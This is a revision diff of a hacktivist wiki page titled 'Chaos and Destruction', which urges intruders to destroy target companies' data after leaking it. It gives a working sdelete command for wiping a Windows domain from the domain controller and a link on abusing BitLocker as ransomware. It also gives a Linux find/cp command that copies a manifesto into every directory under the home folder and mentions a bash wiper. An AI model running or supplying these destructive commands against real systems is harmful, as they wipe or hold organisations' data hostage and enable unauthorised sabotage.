Chaos and Destruction: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
Line 3: Line 3:
== Windows ==
== Windows ==
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code>
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code>
BitLocker Cmdlets for Powershell
* https://www.blackhillsinfosec.com/bitlocker-ransomware-using-bitlocker-for-nefarious-reasons


== Linux ==
== Linux ==

Revision as of 22:39, 24 July 2023

Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in Guacamaya's HackBack video, we want to destroy data, not harm human life.

Windows

  • Guacamaya (2:13:35 Wiping windows domain with sdelete on the domain controller) sdelete64.exe -accepteula -r -s C:\*

BitLocker Cmdlets for Powershell

Linux

Print your manifesto across a system

  • find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;

Wipe a Linux system using a bash wiper.